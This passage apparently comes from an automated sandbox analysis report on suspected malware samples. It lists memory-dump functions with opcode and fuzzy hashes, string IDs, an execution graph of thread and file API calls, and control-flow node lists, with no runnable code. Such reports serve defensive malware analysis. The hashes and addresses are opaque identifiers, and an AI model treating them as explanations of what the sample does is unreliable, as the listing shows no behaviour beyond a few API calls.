                                                    • Opcode ID: f65150b87d66a8951ce24db125ec61f8ab0f50c7ae43a56baa3c5a2e4ae927d9
                                                    • Instruction ID: 5cc54565f6c1bbbf6bc213b1eedaa3b0ebeeee6f02b66e0221af18e405d9b73e
                                                    • Opcode Fuzzy Hash: f65150b87d66a8951ce24db125ec61f8ab0f50c7ae43a56baa3c5a2e4ae927d9
                                                    • Instruction Fuzzy Hash: D843DA709586198FEB94EB28C8A5BEDB7B5FF49300F4045E9D00E972A2DE756E81CF40
                                                    Function 00007FFAAC705808 Relevance: 4.2, Strings: 3, Instructions: 424COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0_I$0_I$0_I
                                                    • API String ID: 0-3182682118
                                                    • Opcode ID: 531d969b29c6cc3d859a54e030b9bafb8071f907e37fb68e2cbd4a6f91066385
                                                    • Instruction ID: 9716cd1081a5cdf7f7d66ac13e39f95f66e8d949349389264c23f6d6f3e642a0
                                                    • Opcode Fuzzy Hash: 531d969b29c6cc3d859a54e030b9bafb8071f907e37fb68e2cbd4a6f91066385
                                                    • Instruction Fuzzy Hash: 89E1868391FBC2ABFBD282EC08191765EB2BB6355075D80BBD0890B58B9415E91DC3DF
                                                    Function 00007FFAAC6F629D Relevance: 2.7, Strings: 2, Instructions: 191COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 1_^$1_^
                                                    • API String ID: 0-1270353967
                                                    • Opcode ID: 1ce88c900ef8e1d9d9426595c96e3ec29beb0a4263b34298819ac35493e8f4c4
                                                    • Instruction ID: f42fdf43aa6839be6053509d47cfc2d519ba3ece4bf4aa0f37a9509dd9d32c7c
                                                    • Opcode Fuzzy Hash: 1ce88c900ef8e1d9d9426595c96e3ec29beb0a4263b34298819ac35493e8f4c4
                                                    • Instruction Fuzzy Hash: A051B36790E3939BF356D72CD4A20E17F90AF53324708A5BBC189CA4A3ED19E45E42C1
                                                    Function 00007FFAAC703EFA Relevance: .4, Instructions: 424COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 542f6177bc37a4e7d3a072e6301ccc51efa5343c9083dfedd87feedbd5f43108
                                                    • Instruction ID: c43a4ee4f678cc8c1cb137016c254e31fd9b8cdc0fdc72de74c484fca63635e4
                                                    • Opcode Fuzzy Hash: 542f6177bc37a4e7d3a072e6301ccc51efa5343c9083dfedd87feedbd5f43108
                                                    • Instruction Fuzzy Hash: D2E115B290E7D2ABF396977C98520A57FB1BF0335471880FBC0898A5A7DD24E80D87D1
                                                    Function 00007FFAAC705FB0 Relevance: .3, Instructions: 313COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4fb4bf2790951ec759a81c1d4c0199bef1bef88eddad87fc975769ef622762a3
                                                    • Instruction ID: 4b86931934542165d382192171c1059d4881fd7f92ad33fc5463d5d3277717f3
                                                    • Opcode Fuzzy Hash: 4fb4bf2790951ec759a81c1d4c0199bef1bef88eddad87fc975769ef622762a3
                                                    • Instruction Fuzzy Hash: E8A1E18AA1FBC19BF2A643AC18265F92FA26F6715070D80FBD0494B59F9444E80EC3D6
                                                    Function 00007FFAAC5513B5 Relevance: .2, Instructions: 238COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f8c5180912dcb3a3738b9b07f252254c656452e22d09147a90a70ce191559b42
                                                    • Instruction ID: f37417cf12bbc5196ccd1eae57e6ab1917a93ca50015626c5040953ae5a9db26
                                                    • Opcode Fuzzy Hash: f8c5180912dcb3a3738b9b07f252254c656452e22d09147a90a70ce191559b42
                                                    • Instruction Fuzzy Hash: 0E714F70908A4D8FEBA8DF18C845BF97BE4FB59310F14812AE84EC7251DB75E985CB81
                                                    Function 00007FFAAC704AE0 Relevance: .2, Instructions: 222COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 162ec6352fb3d640cf853aef85fea127a50f623d848f4e860d579c2d8e8a0d0e
                                                    • Instruction ID: fd2b8a278878840d5de638cad857d836d17bfadef4d226e7303adb81ce2270d3
                                                    • Opcode Fuzzy Hash: 162ec6352fb3d640cf853aef85fea127a50f623d848f4e860d579c2d8e8a0d0e
                                                    • Instruction Fuzzy Hash: 6571169390F7D2EBF392437C582A1A96F61AF2365074C84FAD0884B997ED04E91DC3C6
                                                    Function 00007FFAAC7053D4 Relevance: .2, Instructions: 211COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9e8b5ee9646f9a36f5578358f9215cb202543fcf457caf8249bca1a36c3a52e0
                                                    • Instruction ID: 6fcc52480302ede514e0452262b2d9cfe5e4fe992d8a662ab9ce01fec2e39e95
                                                    • Opcode Fuzzy Hash: 9e8b5ee9646f9a36f5578358f9215cb202543fcf457caf8249bca1a36c3a52e0
                                                    • Instruction Fuzzy Hash: 7871914290FBD2ABF7D382B858251B56E73AF2315075980FBD0884B49BA515EE1CC3DB
                                                    Function 00007FFAAC7055F0 Relevance: .2, Instructions: 209COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7bfe5f536ac8c2a874e9709a208a47a9583a762a719a51c4ef54db4b611e46e9
                                                    • Instruction ID: 255b473225bf92e720dcdb364f5a32acd6f11d4a8a75117657e65d2d1adc55bf
                                                    • Opcode Fuzzy Hash: 7bfe5f536ac8c2a874e9709a208a47a9583a762a719a51c4ef54db4b611e46e9
                                                    • Instruction Fuzzy Hash: 8271848291FFC1AAF7D283BC082A1765FB26B6369070940FBC1490799B9454E91DC3DF
                                                    Function 00007FFAAC704CF8 Relevance: .2, Instructions: 184COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be1dc25fd105e3ef9105c68f348dfee2043967bdb933f6cafe13af758c243eb7
                                                    • Instruction ID: 42af81517238dc8e525c3df81089a394c01ca0363e537098d6c05cb2c6837f78
                                                    • Opcode Fuzzy Hash: be1dc25fd105e3ef9105c68f348dfee2043967bdb933f6cafe13af758c243eb7
                                                    • Instruction Fuzzy Hash: EC51B78290F7E2ABE79343BC44261A96F71AF2355075980FBC1894B997AC05EE1CC3D6
                                                    Function 00007FFAACCA35C0 Relevance: .1, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1363044076.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaacca0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 93cccc7892812843fe8925e98984734b6c85684237fc22d73868fde8d97a446d
                                                    • Instruction ID: 072e1eb45d74115e54c1f2caaa3c620902bcff9e20ebd34bc6f1381e37a1f13e
                                                    • Opcode Fuzzy Hash: 93cccc7892812843fe8925e98984734b6c85684237fc22d73868fde8d97a446d
                                                    • Instruction Fuzzy Hash: AB314DB780E3AA0AD342F77CE4A15E6BB909E072B870C87F7C1999D2A3DC045448D7D9
                                                    Function 00007FFAAC6FCDCD Relevance: .1, Instructions: 102COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 354c6cbb91a4f91256cd531eefbbf5e8a29a27d3700311b39bac56402acf4c4f
                                                    • Instruction ID: 5b231c15dc32ec8e2465b09b6f9cc21d02d4fd89f39dfea5e8b1a59be6e69405
                                                    • Opcode Fuzzy Hash: 354c6cbb91a4f91256cd531eefbbf5e8a29a27d3700311b39bac56402acf4c4f
                                                    • Instruction Fuzzy Hash: 4731F670D08A1DCFDF88DF98D491AEDBBF1FBA9300F20516AD419E3281CA359945CB84
                                                    Function 00007FFAAC5509B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: c9$!k9$"s9$#{9
                                                    • API String ID: 0-1692736845
                                                    • Opcode ID: 5b34ace8a1115f8b973b82c0c97b4298cc327aeb171151a34496bff7b73ae7eb
                                                    • Instruction ID: 3fca43769a749241d5472f25fd41d0bc175b162ae1a4e44815976caf913fed21
                                                    • Opcode Fuzzy Hash: 5b34ace8a1115f8b973b82c0c97b4298cc327aeb171151a34496bff7b73ae7eb
                                                    • Instruction Fuzzy Hash: EA51B3F6A0D46B46E24233BDB4228FD6744DF8B3B5B48CA37E04DE92B34D09608586D5

                                                    Execution Graph

                                                    Execution Coverage:5.2%
                                                    Dynamic/Decrypted Code Coverage:75%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:12
                                                    Total number of Limit Nodes:0
                                                    execution_graph 21616 7ffaac72e84d 21617 7ffaac72e85b SuspendThread 21616->21617 21619 7ffaac72e934 21617->21619 21612 7ffaac730040 21613 7ffaac73007b ResumeThread 21612->21613 21615 7ffaac730154 21613->21615 21624 7ffaac731e35 21625 7ffaac731e4f GetFileAttributesW 21624->21625 21627 7ffaac731f15 21625->21627 21620 7ffaac7301a9 21621 7ffaac7301b7 CloseHandle 21620->21621 21623 7ffaac730294 21621->21623

                                                    Executed Functions

                                                    Function 00007FFAACCD194F Relevance: .7, Instructions: 736COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 468 7ffaaccd194f-7ffaaccd1962 469 7ffaaccd1964-7ffaaccd1ca5 468->469 470 7ffaaccd19ae-7ffaaccd19c4 468->470 475 7ffaaccd1caf-7ffaaccd1cee 469->475 472 7ffaaccd1a54-7ffaaccd1a84 470->472 473 7ffaaccd19ca-7ffaaccd19d2 470->473 482 7ffaaccd1b2e-7ffaaccd1b37 472->482 483 7ffaaccd1a8a-7ffaaccd1a8b 472->483 474 7ffaaccd19d8-7ffaaccd19ea 473->474 473->475 474->475 477 7ffaaccd19f0-7ffaaccd1a07 474->477 486 7ffaaccd1cf0 475->486 478 7ffaaccd1a47-7ffaaccd1a4e 477->478 479 7ffaaccd1a09-7ffaaccd1a10 477->479 478->472 478->473 479->475 484 7ffaaccd1a16-7ffaaccd1a44 479->484 488 7ffaaccd1c6f-7ffaaccd1c95 482->488 489 7ffaaccd1b3d-7ffaaccd1b43 482->489 487 7ffaaccd1a8e-7ffaaccd1aa4 483->487 484->478 494 7ffaaccd1cfb-7ffaaccd1d91 486->494 487->475 490 7ffaaccd1aaa-7ffaaccd1ace 487->490 489->475 491 7ffaaccd1b49-7ffaaccd1b58 489->491 492 7ffaaccd1ad0-7ffaaccd1af3 490->492 493 7ffaaccd1b21-7ffaaccd1b28 490->493 495 7ffaaccd1c62-7ffaaccd1c69 491->495 496 7ffaaccd1b5e-7ffaaccd1b65 491->496 492->475 501 7ffaaccd1af9-7ffaaccd1b1f 492->501 493->482 493->487 502 7ffaaccd1d16-7ffaaccd1d96 494->502 503 7ffaaccd1d9c-7ffaaccd1ddf 494->503 495->488 495->489 496->475 498 7ffaaccd1b6b-7ffaaccd1b75 496->498 504 7ffaaccd1b7c-7ffaaccd1b87 498->504 501->492 501->493 502->503 515 7ffaaccd1d38-7ffaaccd1d98 502->515 514 7ffaaccd1de1-7ffaaccd1e36 503->514 506 7ffaaccd1bc6-7ffaaccd1bd5 504->506 507 7ffaaccd1b89-7ffaaccd1ba0 504->507 506->475 509 7ffaaccd1bdb-7ffaaccd1bff 506->509 507->475 508 7ffaaccd1ba6-7ffaaccd1bc2 507->508 508->507 512 7ffaaccd1bc4 508->512 513 7ffaaccd1c02-7ffaaccd1c1f 509->513 516 7ffaaccd1c42-7ffaaccd1c58 512->516 513->475 517 7ffaaccd1c25-7ffaaccd1c40 513->517 529 7ffaaccd1e41-7ffaaccd1ee7 514->529 515->503 522 7ffaaccd1d5c-7ffaaccd1d9a 515->522 516->475 521 7ffaaccd1c5a-7ffaaccd1c5e 516->521 517->513 517->516 521->495 522->503 528 7ffaaccd1d7d-7ffaaccd1d90 522->528 541 7ffaaccd2017-7ffaaccd2034 529->541 542 7ffaaccd1eed-7ffaaccd2290 529->542 544 7ffaaccd2341-7ffaaccd23a8 541->544 545 7ffaaccd203a-7ffaaccd203f 541->545 553 7ffaaccd2518 544->553 546 7ffaaccd2042-7ffaaccd2049 545->546 548 7ffaaccd204b-7ffaaccd204f 546->548 549 7ffaaccd1fcc-7ffaaccd2339 546->549 548->514 552 7ffaaccd2055 548->552 549->544 554 7ffaaccd20d3-7ffaaccd20d6 552->554 553->553 555 7ffaaccd20d9-7ffaaccd20e0 554->555 556 7ffaaccd20e6 555->556 557 7ffaaccd2057-7ffaaccd208c call 7ffaaccd1ce0 555->557 559 7ffaaccd2156-7ffaaccd215d 556->559 557->544 563 7ffaaccd2092-7ffaaccd20a2 557->563 561 7ffaaccd20e8-7ffaaccd211a call 7ffaaccd1ce0 559->561 562 7ffaaccd215f-7ffaaccd21a5 559->562 561->544 570 7ffaaccd2120-7ffaaccd2148 561->570 576 7ffaaccd1f74-7ffaaccd1f78 562->576 577 7ffaaccd21ab-7ffaaccd21b0 562->577 563->514 566 7ffaaccd20a8-7ffaaccd20c5 563->566 566->544 568 7ffaaccd20cb-7ffaaccd20d0 566->568 568->554 570->544 571 7ffaaccd214e-7ffaaccd2153 570->571 571->559 578 7ffaaccd1fca 576->578 579 7ffaaccd1f7a-7ffaaccd2318 576->579 580 7ffaaccd2236-7ffaaccd223a 577->580 578->546 581 7ffaaccd21b5-7ffaaccd21e4 call 7ffaaccd1ce0 580->581 582 7ffaaccd2240-7ffaaccd2246 580->582 581->544 586 7ffaaccd21ea-7ffaaccd21fa 581->586 586->529 587 7ffaaccd2200-7ffaaccd220f 586->587 587->544 588 7ffaaccd2215-7ffaaccd2228 587->588 588->555 589 7ffaaccd222e-7ffaaccd2233 588->589 589->580
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 80643edb5fef55cf9d931c3625f55e72803904f6ceb8228b57c1a87d9e86b69c
                                                    • Instruction ID: 1558c3f36054a0a61cd7e2858c440da07dc3601def9638099f36ed1933fdf2d6
                                                    • Opcode Fuzzy Hash: 80643edb5fef55cf9d931c3625f55e72803904f6ceb8228b57c1a87d9e86b69c
                                                    • Instruction Fuzzy Hash: 9C529E70919649CFEB5ECF18C4A46B87BA1FF49310F5081BED44ED7686DA38E895CB80
                                                    Function 00007FFAACCD9B4A Relevance: .7, Instructions: 701COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 590 7ffaaccd9b4a-7ffaaccd9b57 591 7ffaaccd9b59-7ffaaccd9b61 590->591 592 7ffaaccd9b62-7ffaaccd9c59 590->592 591->592 596 7ffaaccd9cf7-7ffaaccd9d0b 592->596 597 7ffaaccd9c5f-7ffaaccd9c7b 592->597 598 7ffaaccd9d11-7ffaaccd9d59 596->598 597->596 601 7ffaaccd9c7d-7ffaaccd9c92 597->601 602 7ffaaccd9df4-7ffaaccd9e05 598->602 603 7ffaaccd9d5f-7ffaaccd9d7b 598->603 607 7ffaaccd9c94-7ffaaccd9ca6 601->607 608 7ffaaccd9ccb-7ffaaccd9cf5 601->608 604 7ffaaccd9e0b-7ffaaccd9f4b 602->604 603->602 610 7ffaaccd9d7d-7ffaaccd9d92 603->610 626 7ffaaccd9f51-7ffaaccd9f6a 604->626 627 7ffaaccd9fe0-7ffaaccd9fee 604->627 611 7ffaaccd9ca8 607->611 612 7ffaaccd9caa-7ffaaccd9cbd 607->612 608->598 617 7ffaaccd9d94-7ffaaccd9da6 610->617 618 7ffaaccd9dcb-7ffaaccd9df2 610->618 611->612 612->612 613 7ffaaccd9cbf-7ffaaccd9cc7 612->613 613->608 619 7ffaaccd9da8 617->619 620 7ffaaccd9daa-7ffaaccd9dbd 617->620 618->604 619->620 620->620 622 7ffaaccd9dbf-7ffaaccd9dc7 620->622 622->618 626->627 630 7ffaaccd9f6c-7ffaaccd9f7e 626->630 628 7ffaaccd9ff4-7ffaaccda046 627->628 632 7ffaaccda0db-7ffaaccda0e9 628->632 633 7ffaaccda04c-7ffaaccda065 628->633 637 7ffaaccd9fb7-7ffaaccd9fde 630->637 638 7ffaaccd9f80-7ffaaccd9f92 630->638 635 7ffaaccda0ef-7ffaaccda1bf 632->635 633->632 639 7ffaaccda067-7ffaaccda079 633->639 648 7ffaaccda1c7-7ffaaccda1d9 635->648 637->628 640 7ffaaccd9f96-7ffaaccd9fa9 638->640 641 7ffaaccd9f94 638->641 646 7ffaaccda0b2-7ffaaccda0d9 639->646 647 7ffaaccda07b-7ffaaccda08d 639->647 640->640 643 7ffaaccd9fab-7ffaaccd9fb3 640->643 641->640 643->637 646->635 649 7ffaaccda08f 647->649 650 7ffaaccda091-7ffaaccda0a4 647->650 651 7ffaaccda1e1-7ffaaccda2cf call 7ffaaccda2eb 648->651 652 7ffaaccda1db 648->652 649->650 650->650 653 7ffaaccda0a6-7ffaaccda0ae 650->653 663 7ffaaccda2d6-7ffaaccda2ea 651->663 664 7ffaaccda2d1 651->664 652->651 653->646 664->663
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d4cfb3dd0c054b6d318517602823e6fc5ab02692ba04c067ecff5735660dd2cb
                                                    • Instruction ID: e8e7fd4954384701f597610102eb5a58d947f64655aa78cbbce988d4ec2d9c05
                                                    • Opcode Fuzzy Hash: d4cfb3dd0c054b6d318517602823e6fc5ab02692ba04c067ecff5735660dd2cb
                                                    • Instruction Fuzzy Hash: DE325D70918A8D8FEBB9EF28C855BE937E1FB69301F00412AD84ED7691DF749584CB81
                                                    Function 00007FFAACCDAFA2 Relevance: .7, Instructions: 669COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 665 7ffaaccdafa2-7ffaaccdafaf 666 7ffaaccdafb1-7ffaaccdafb9 665->666 667 7ffaaccdafba-7ffaaccdb0b9 665->667 666->667 671 7ffaaccdb157-7ffaaccdb16b 667->671 672 7ffaaccdb0bf-7ffaaccdb0db 667->672 673 7ffaaccdb171-7ffaaccdb1b9 671->673 672->671 676 7ffaaccdb0dd-7ffaaccdb0f2 672->676 677 7ffaaccdb257-7ffaaccdb26b 673->677 678 7ffaaccdb1bf-7ffaaccdb1db 673->678 682 7ffaaccdb0f4-7ffaaccdb106 676->682 683 7ffaaccdb12b-7ffaaccdb155 676->683 679 7ffaaccdb271-7ffaaccdb2c6 677->679 678->677 687 7ffaaccdb1dd-7ffaaccdb1f2 678->687 689 7ffaaccdb35b-7ffaaccdb369 679->689 690 7ffaaccdb2cc-7ffaaccdb2e5 679->690 684 7ffaaccdb108 682->684 685 7ffaaccdb10a-7ffaaccdb11d 682->685 683->673 684->685 685->685 688 7ffaaccdb11f-7ffaaccdb127 685->688 694 7ffaaccdb1f4-7ffaaccdb206 687->694 695 7ffaaccdb22b-7ffaaccdb255 687->695 688->683 691 7ffaaccdb36f-7ffaaccdb3c3 689->691 690->689 697 7ffaaccdb2e7-7ffaaccdb2f9 690->697 701 7ffaaccdb3c9-7ffaaccdb3e2 691->701 702 7ffaaccdb458-7ffaaccdb466 691->702 698 7ffaaccdb208 694->698 699 7ffaaccdb20a-7ffaaccdb21d 694->699 695->679 706 7ffaaccdb332-7ffaaccdb359 697->706 707 7ffaaccdb2fb-7ffaaccdb30d 697->707 698->699 699->699 700 7ffaaccdb21f-7ffaaccdb227 699->700 700->695 701->702 709 7ffaaccdb3e4-7ffaaccdb3f6 701->709 703 7ffaaccdb46c-7ffaaccdb5de 702->703 724 7ffaaccdb5e6-7ffaaccdb664 703->724 725 7ffaaccdb5e0 703->725 706->691 710 7ffaaccdb30f 707->710 711 7ffaaccdb311-7ffaaccdb324 707->711 716 7ffaaccdb3f8-7ffaaccdb40a 709->716 717 7ffaaccdb42f-7ffaaccdb456 709->717 710->711 711->711 712 7ffaaccdb326-7ffaaccdb32e 711->712 712->706 718 7ffaaccdb40e-7ffaaccdb421 716->718 719 7ffaaccdb40c 716->719 717->703 718->718 721 7ffaaccdb423-7ffaaccdb42b 718->721 719->718 721->717 729 7ffaaccdb66b-7ffaaccdb6d2 call 7ffaaccdb6ee 724->729 725->724 735 7ffaaccdb6d9-7ffaaccdb6ed 729->735 736 7ffaaccdb6d4 729->736 736->735
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e850c214b66d77a884c7bf21f1b8cf779d1db3a5d02fd7e2e83f56b9303e4b9b
                                                    • Instruction ID: b69481b3d836dbbbf6369c7bd3ba84c7005464636964de5e3d0735a6f00e7608
                                                    • Opcode Fuzzy Hash: e850c214b66d77a884c7bf21f1b8cf779d1db3a5d02fd7e2e83f56b9303e4b9b
                                                    • Instruction Fuzzy Hash: 3D322C70919A8D8FEBB9EF28C855BE937E1FB59301F00412AD84EC7691DF749684CB81
                                                    Function 00007FFAAC580D68 Relevance: .3, Instructions: 273COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac580000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5809d369001b92751b6552e86dc94b361dcaba80e6ba7d260184c704f5a98c0c
                                                    • Instruction ID: ea507bac5a92ff212e57c0bba02f730ca223e82fe603b5e36621b3e008bcb007
                                                    • Opcode Fuzzy Hash: 5809d369001b92751b6552e86dc94b361dcaba80e6ba7d260184c704f5a98c0c
                                                    • Instruction Fuzzy Hash: BAA1F671958A8A8FE788DB68C8657A97FE2FF95300F40407AE04DD76D2CB741856CB84
                                                    Function 00007FFAACCD3598 Relevance: 2.0, Instructions: 1958COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 7ffaaccd3598-7ffaaccd3763 15 7ffaaccd3769-7ffaaccd37f3 0->15 16 7ffaaccd4d8a-7ffaaccd4da8 call 7ffaaccd4f2d call 7ffaaccd4f7d 0->16 28 7ffaaccd37f5-7ffaaccd3828 15->28 29 7ffaaccd382d-7ffaaccd390c 15->29 32 7ffaaccd3912-7ffaaccd39ad 28->32 29->32 44 7ffaaccd39e7-7ffaaccd3ac6 32->44 45 7ffaaccd39af-7ffaaccd39e2 32->45 48 7ffaaccd3acc-7ffaaccd3b67 44->48 45->48 60 7ffaaccd3b69-7ffaaccd3b6e 48->60 61 7ffaaccd3b73-7ffaaccd3c18 48->61 62 7ffaaccd3c1c-7ffaaccd3caf 60->62 61->62 72 7ffaaccd3cb1-7ffaaccd3cb6 62->72 73 7ffaaccd3cbb-7ffaaccd3d61 62->73 75 7ffaaccd3d64-7ffaaccd3df7 72->75 73->75 84 7ffaaccd3df9-7ffaaccd3e2c 75->84 85 7ffaaccd3e31-7ffaaccd3f10 75->85 88 7ffaaccd3f16-7ffaaccd3fb1 84->88 85->88 100 7ffaaccd3fb3-7ffaaccd3fe6 88->100 101 7ffaaccd3feb-7ffaaccd415b 88->101 105 7ffaaccd4161-7ffaaccd41fc 100->105 101->105 117 7ffaaccd4236-7ffaaccd43a6 105->117 118 7ffaaccd41fe-7ffaaccd4231 105->118 123 7ffaaccd43ac-7ffaaccd4447 117->123 118->123 137 7ffaaccd4449-7ffaaccd447c 123->137 138 7ffaaccd4481-7ffaaccd4560 123->138 143 7ffaaccd4566-7ffaaccd4601 137->143 138->143 156 7ffaaccd4603-7ffaaccd4636 143->156 157 7ffaaccd463b-7ffaaccd471a 143->157 160 7ffaaccd4720-7ffaaccd47bb 156->160 157->160 172 7ffaaccd47f5-7ffaaccd4965 160->172 173 7ffaaccd47bd-7ffaaccd47f0 160->173 176 7ffaaccd496b-7ffaaccd4a06 172->176 173->176 189 7ffaaccd4a08-7ffaaccd4a3b 176->189 190 7ffaaccd4a40-7ffaaccd4bb0 176->190 194 7ffaaccd4bb6-7ffaaccd4c51 189->194 190->194 209 7ffaaccd4c53-7ffaaccd4c58 194->209 210 7ffaaccd4c5d-7ffaaccd4d7e 194->210 211 7ffaaccd4d81-7ffaaccd4d84 209->211 210->211 211->16
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
